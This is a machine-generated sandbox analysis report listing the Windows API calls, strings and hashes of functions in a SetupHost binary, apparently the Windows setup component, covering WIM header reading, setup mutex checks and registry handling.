                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2516516997-0
                                                                                                                                                                                                                • Opcode ID: d953c079c86102dc2fe7246a72a2460214bbd96f9f3886c8d63bd442acad8324
                                                                                                                                                                                                                • Instruction ID: 4f7efa498f09e86db1b497a3dd107c0c27637868d649957df3cfd90d6c28a4ec
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d953c079c86102dc2fe7246a72a2460214bbd96f9f3886c8d63bd442acad8324
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 171177B160C311BFE7159BF59C0DEBF7E6CEB497A1B108629F912D6190EEA09D024670
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000057,00000000,00000000,00000000,?,009C05DB), ref: 009BEAFC
                                                                                                                                                                                                                • GetLongPathNameW.KERNEL32 ref: 009BEB19
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000000,?,009C05DB), ref: 009BEB2B
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,009C05DB), ref: 009BEB32
                                                                                                                                                                                                                • GetLongPathNameW.KERNEL32 ref: 009BEB43
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,009C05DB), ref: 009BEB4D
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,009C05DB), ref: 009BEB5C
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,009C05DB), ref: 009BEB63
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,009C05DB), ref: 009BEB6E
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$ErrorLast$LongNamePathProcess$AllocFree
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2916844277-0
                                                                                                                                                                                                                • Opcode ID: 54e50078c3ec33c8409a30961a5d39c6ca75c9008c9dfb3cb71efda76d0217e1
                                                                                                                                                                                                                • Instruction ID: fe856a0d8a1e8ce08e5c978bee1deae3dcb63cebf551a17fc42a22464ef01232
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54e50078c3ec33c8409a30961a5d39c6ca75c9008c9dfb3cb71efda76d0217e1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14019232B04721ABD7219BF69D4CFFF7A7CAB84B62F045428F903D6150DA64CC0196A4
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • wcschr.MSVCRT ref: 009FD5BF
                                                                                                                                                                                                                • GetVolumeNameForVolumeMountPointW.KERNEL32(?,?,00000032), ref: 009FD619
                                                                                                                                                                                                                • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,00000104,?), ref: 009FD636
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009FD6C7
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 009FD6CE
                                                                                                                                                                                                                  • Part of subcall function 009FD276: _vsnwprintf.MSVCRT ref: 009FD2AA
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Volume$HeapName$AllocMountNamesPathPointProcess_vsnwprintfwcschr
                                                                                                                                                                                                                • String ID: %ws\%ws$\\?\GlobalRoot
                                                                                                                                                                                                                • API String ID: 3936443651-2895950564
                                                                                                                                                                                                                • Opcode ID: 202eb61cb1cb59075efd1cfef894e44ff13f6864eb020e54b04b977616510fa1
                                                                                                                                                                                                                • Instruction ID: 95985b5b0ccf2f09827c39d9aeb8be8ad5d70a693c242da5fd31bd5a02028b9d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 202eb61cb1cb59075efd1cfef894e44ff13f6864eb020e54b04b977616510fa1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9741F3B5A002189BDF20DF64CC85AFAB3BDEB88304F0584ADEA0DD7140DB309E85CB94
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 009E54A3: EnterCriticalSection.KERNEL32(00000000,00A124A8,00000030,009DDF5C,00000000,00000000,00000000,?,00000000,00000000,009DE358,?,?,00000000), ref: 009E54EA
                                                                                                                                                                                                                  • Part of subcall function 009E54A3: GetProcessHeap.KERNEL32(00000000,?,?,00000000,00000000,009DE358,?,?,00000000), ref: 009E5516
                                                                                                                                                                                                                  • Part of subcall function 009E54A3: HeapFree.KERNEL32(00000000,?,00000000), ref: 009E551D
                                                                                                                                                                                                                • CreateFileW.KERNEL32(00000000,C0010000,00000007,00000000,00000002,48000100,00000000), ref: 009E7349
                                                                                                                                                                                                                  • Part of subcall function 009E13ED: RtlNtStatusToDosError.NTDLL ref: 009E14EF
                                                                                                                                                                                                                  • Part of subcall function 009E13ED: RtlNtStatusToDosError.NTDLL ref: 009E14FD
                                                                                                                                                                                                                  • Part of subcall function 009E13ED: SetLastError.KERNEL32(00000000), ref: 009E1519
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009E73F0
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000), ref: 009E740D
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009E7414
                                                                                                                                                                                                                • SetLastError.KERNEL32(?,00000000), ref: 009E7422
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • Failed to get img event, xrefs: 009E73DF
                                                                                                                                                                                                                • CompressFileBackedByWim, xrefs: 009E73D5
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Error$Heap$Last$FreeProcessStatus$CreateCriticalEnterFileSection
                                                                                                                                                                                                                • String ID: CompressFileBackedByWim$Failed to get img event
                                                                                                                                                                                                                • API String ID: 3974560987-1264866896
                                                                                                                                                                                                                • Opcode ID: ef9399c6ad42f29946b2602288be27e52e6c5c239dbc5829b4cc51002b28d07f
                                                                                                                                                                                                                • Instruction ID: 1fced5c262f138254f93d516a89672fc887140d6ab2dcbd918124e9ef12e2f3b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ef9399c6ad42f29946b2602288be27e52e6c5c239dbc5829b4cc51002b28d07f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22415A71E04248AFDB11DFEAD884ADEBBF9EF48710F148525F905E7290D7709C018BA1
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,009E1042,?,?,00000001), ref: 009E1327
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,009E1042,?,?,00000001), ref: 009E133D
                                                                                                                                                                                                                • GetOverlappedResult.KERNEL32(?,00000001,00000001,00000001,?,?,?,?,?,?,?,?,009E1042,?,?,00000001), ref: 009E1371
                                                                                                                                                                                                                  • Part of subcall function 009E11C8: GetFileInformationByHandle.KERNEL32(?,?,00000000,?,00000001), ref: 009E11F3
                                                                                                                                                                                                                  • Part of subcall function 009E11C8: NtQueryInformationFile.NTDLL ref: 009E1240
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,009E1042,?,?,00000001), ref: 009E13A3
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,009E1042,?,?,00000001), ref: 009E13B9
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$FileInformation$HandleOverlappedQueryResult
                                                                                                                                                                                                                • String ID: ReadWriteDataInternal
                                                                                                                                                                                                                • API String ID: 3117618773-695499442
                                                                                                                                                                                                                • Opcode ID: 621d429bb81e9f8d1aca64ed1ae7bbd2e2b1b811c588983f72e25b3bafd9bcd2
                                                                                                                                                                                                                • Instruction ID: d9b6bfb28bed8e07cbf340ddfae1f5dc876f6b1e0cd190f8abae10343f462451
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 621d429bb81e9f8d1aca64ed1ae7bbd2e2b1b811c588983f72e25b3bafd9bcd2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 50319D36604299EB9B029BA7CC44FFE77BDAB84351F11911AF905D7650E734DE028B60
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000002,00000000,00000000,00000000,00000000,?,00000000,?,?,009DDD7D,?,00000000,00000000,00000000), ref: 009EA51A
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,009DDD7D,?,00000000,00000000,00000000,?,009DE028,?,00000000), ref: 009EA521
                                                                                                                                                                                                                • qsort.MSVCRT ref: 009EA555
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 009EA581
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009EA588
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,000001D6,80070216,00000000,00000000,00000000,00000000,?,00000000,?,?,009DDD7D,?,00000000,00000000,00000000), ref: 009EA5BE
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$AllocErrorFreeLastqsort
                                                                                                                                                                                                                • String ID: ResNodesSort
                                                                                                                                                                                                                • API String ID: 3259181355-3239281311
                                                                                                                                                                                                                • Opcode ID: 5d49b16fa2ba10a18f699d4a4f362cbe419b700755dc215b50bf17d459232b61
                                                                                                                                                                                                                • Instruction ID: 043588d5e7acab7842d993c587e48e06616eaa69ae09ec899fe2821c19b66299
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d49b16fa2ba10a18f699d4a4f362cbe419b700755dc215b50bf17d459232b61
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8631F471B00341ABD722DF6AC848A6F7BE9EB89361F104428F546DB2A0EA30EC018A51
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 009BE595: _vsnwprintf.MSVCRT ref: 009BE5C7
                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32 ref: 00A0A4C8
                                                                                                                                                                                                                • RegDeleteTreeW.ADVAPI32(?,QueryParameters), ref: 00A0A4F0
                                                                                                                                                                                                                • RegCreateKeyExW.ADVAPI32(?,QueryParameters,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00A0A521
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00A0A56B
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00A0A57F
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Close$CreateDeleteOpenTree_vsnwprintf
                                                                                                                                                                                                                • String ID: %ls\%ls\%ls$QueryParameters
                                                                                                                                                                                                                • API String ID: 281199228-3368011194
                                                                                                                                                                                                                • Opcode ID: 71b804ec46c1fec2adf5a63ab12a242a2363252c551078839e77f032fbd5d3ac
                                                                                                                                                                                                                • Instruction ID: e96c580793262a7ee7367e4bdcdefb3fab8841aaaa8ba1745c4ca65f6be42989
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 71b804ec46c1fec2adf5a63ab12a242a2363252c551078839e77f032fbd5d3ac
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6031D673D4163DABCB21DB64DC88AEAB77CFB24310F0141A5A919A7180D670AE40CBE1
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 009AA769
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 009AA871
                                                                                                                                                                                                                  • Part of subcall function 009B8A19: __EH_prolog3.LIBCMT ref: 009B8A20
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 009AA852
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • SetupHost: Detected existing setup mutex... exiting., xrefs: 009AA81E
                                                                                                                                                                                                                • Global\Microsoft.Windows.Setup, xrefs: 009AA7B1
                                                                                                                                                                                                                • SetupHost: Creating setup mutex..., xrefs: 009AA78F
                                                                                                                                                                                                                • CSetupHost::CheckSetupMutex, xrefs: 009AA7DF
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseH_prolog3Handle
                                                                                                                                                                                                                • String ID: CSetupHost::CheckSetupMutex$Global\Microsoft.Windows.Setup$SetupHost: Creating setup mutex...$SetupHost: Detected existing setup mutex... exiting.
                                                                                                                                                                                                                • API String ID: 2454561918-2158441188
                                                                                                                                                                                                                • Opcode ID: 9a2bc7d79310a3a6cc2cf2595eb81a8d0ee60598106542b58a190ead27578ccd
                                                                                                                                                                                                                • Instruction ID: 39e777991c066e526d780eaf191e0cded0d5d35c89c6df522fa1e1dfd5863975
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a2bc7d79310a3a6cc2cf2595eb81a8d0ee60598106542b58a190ead27578ccd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73319875B001158BCF05EBA4CC99A7D7776AFC5720B198466E812AB395CF78DC02CB92
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00A0DB00
                                                                                                                                                                                                                • memset.MSVCRT ref: 00A0DB39
                                                                                                                                                                                                                • RtlGetVersion.NTDLL ref: 00A0DB52
                                                                                                                                                                                                                • memset.MSVCRT ref: 00A0DB87
                                                                                                                                                                                                                • GetUserDefaultUILanguage.KERNEL32 ref: 00A0DB8F
                                                                                                                                                                                                                  • Part of subcall function 00A0E697: bsearch.MSVCRT ref: 00A0E6C3
                                                                                                                                                                                                                  • Part of subcall function 00A0E697: SetLastError.KERNEL32(00000057), ref: 00A0E712
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000055), ref: 00A0DBA9
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLastmemset$DefaultH_prolog3_LanguageUserVersionbsearch
                                                                                                                                                                                                                • String ID: Unknown
                                                                                                                                                                                                                • API String ID: 1530830379-1654365787
                                                                                                                                                                                                                • Opcode ID: b852298902d004b93ca9b6d9c19c54aac70b8519d307e37822d1f06a5c3e1989
                                                                                                                                                                                                                • Instruction ID: 22fb5295cdf1ec278d0f229ca96e33c3e422b777cfc331da739bd2624b178f90
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b852298902d004b93ca9b6d9c19c54aac70b8519d307e37822d1f06a5c3e1989
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F21B232A0026D8BCF24EBA1DD55BED76B5AFD1320F014195EA09AB2C0DB745F41CF41
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,api-ms-win-eventing-provider-l1-1-0.dll,?,?,00000000,?,?,?,009A08F7,?,00000000), ref: 009A0921
                                                                                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,advapi32.dll,?,?,?,?,009A08F7,?,00000000), ref: 009A0936
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,EventSetInformation,?,?,?,009A08F7,?,00000000), ref: 009A0948
                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,009A08F7,?,00000000), ref: 009A0971
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • advapi32.dll, xrefs: 009A092F
                                                                                                                                                                                                                • api-ms-win-eventing-provider-l1-1-0.dll, xrefs: 009A091A
                                                                                                                                                                                                                • EventSetInformation, xrefs: 009A0940
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                • String ID: EventSetInformation$advapi32.dll$api-ms-win-eventing-provider-l1-1-0.dll
                                                                                                                                                                                                                • API String ID: 3947729631-147808218
                                                                                                                                                                                                                • Opcode ID: 58feed387f6a3f0d2f3a0ad13cc8f5933a67689ad97ea736d9db1515cd44c7b1
                                                                                                                                                                                                                • Instruction ID: 921867bab419e6bccdc3d333d6b755d21f53721f31d183be4b8430c97de0aedc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 58feed387f6a3f0d2f3a0ad13cc8f5933a67689ad97ea736d9db1515cd44c7b1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E8018432240214BBEB119BA5DC0AFAFBA7DEFC0B55F148025FD04E62A1D671CE01D690
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(ntdll.dll,00000000,00000800,?,?,?,?,00A088BB,?), ref: 00A0A5AB
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RtlGetPersistedStateLocation,?,?,?,?,00A088BB,?), ref: 00A0A5C7
                                                                                                                                                                                                                • wcscpy_s.MSVCRT ref: 00A0A601
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressLibraryLoadProcwcscpy_s
                                                                                                                                                                                                                • String ID: OneSettingsQuery$RtlGetPersistedStateLocation$SOFTWARE\Microsoft\Windows\CurrentVersion\OneSettings$ntdll.dll
                                                                                                                                                                                                                • API String ID: 110463448-2850939924
                                                                                                                                                                                                                • Opcode ID: b6450680cbfa93991dafae14cd01058e0978dad729ee2741fe753a9874ad4ac0
                                                                                                                                                                                                                • Instruction ID: 5388a9e2cbcf72094f87c5b67542920105df45b3415969edf532c3889f7f09b9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b6450680cbfa93991dafae14cd01058e0978dad729ee2741fe753a9874ad4ac0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D5F0C87268431877DB2057AAAC4DE5B7E6CEBE1BA5F054125FD0193190D5608C1185B1
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 009E2A6F
                                                                                                                                                                                                                • GetLastError.KERNEL32(000000D0,?,00000000,?,?,?,?,?,?,?,00A10D5A,000000FF), ref: 009E2AF3
                                                                                                                                                                                                                • SetLastError.KERNEL32(0000000B,00000002,00000000,00000000,header type/size mismatch,8007000B,ReadWimHeader,00000740,000000D0,?,00000000), ref: 009E2D9D
                                                                                                                                                                                                                  • Part of subcall function 009E2FCE: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000), ref: 009E2FEE
                                                                                                                                                                                                                  • Part of subcall function 009E2FCE: LockFileEx.KERNEL32(00000000,00000002,00000000,000000D0,00000000,?), ref: 009E3009
                                                                                                                                                                                                                  • Part of subcall function 009E2FCE: GetLastError.KERNEL32 ref: 009E3015
                                                                                                                                                                                                                  • Part of subcall function 009E2FCE: GetOverlappedResult.KERNEL32(MSWIM,?,?,00000001), ref: 009E302F
                                                                                                                                                                                                                  • Part of subcall function 009E2FCE: CloseHandle.KERNEL32(?), ref: 009E303D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$CloseCreateEventFileHandleLockOverlappedResultmemset
                                                                                                                                                                                                                • String ID: MSWIM$ReadWimHeader$cannot read WIM header$header type/size mismatch$header version mismatch
                                                                                                                                                                                                                • API String ID: 2720965076-53030249
                                                                                                                                                                                                                • Opcode ID: 54cd22453ac5d21511559108c1a986b04eea57b1ab2f7754bc3a2677e70f2522
                                                                                                                                                                                                                • Instruction ID: 04538d25ced49b45b91cf2c54d62f3d27a2e07485f2ca8abae1b5ef023b3cd3c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54cd22453ac5d21511559108c1a986b04eea57b1ab2f7754bc3a2677e70f2522
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4AA1E674A00259CFDB61DF69C881B98B7F4BB58304F2481EAE54CEB242E7729D82CF50
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 009DB3AC: DbgPrintEx.NTDLL ref: 009DB3F2
                                                                                                                                                                                                                  • Part of subcall function 009DB3AC: RtlRaiseStatus.NTDLL(C0000420), ref: 009DB400
                                                                                                                                                                                                                • memcpy.MSVCRT ref: 009C96FA
                                                                                                                                                                                                                  • Part of subcall function 009C6B97: RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 009C6BAF
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • MicrodomImplementation::CMicrodom::GetElementsByTagNameCommon, xrefs: 009C97E3
                                                                                                                                                                                                                • ObjectHeader->uElementType == ucObjectType, xrefs: 009C9644
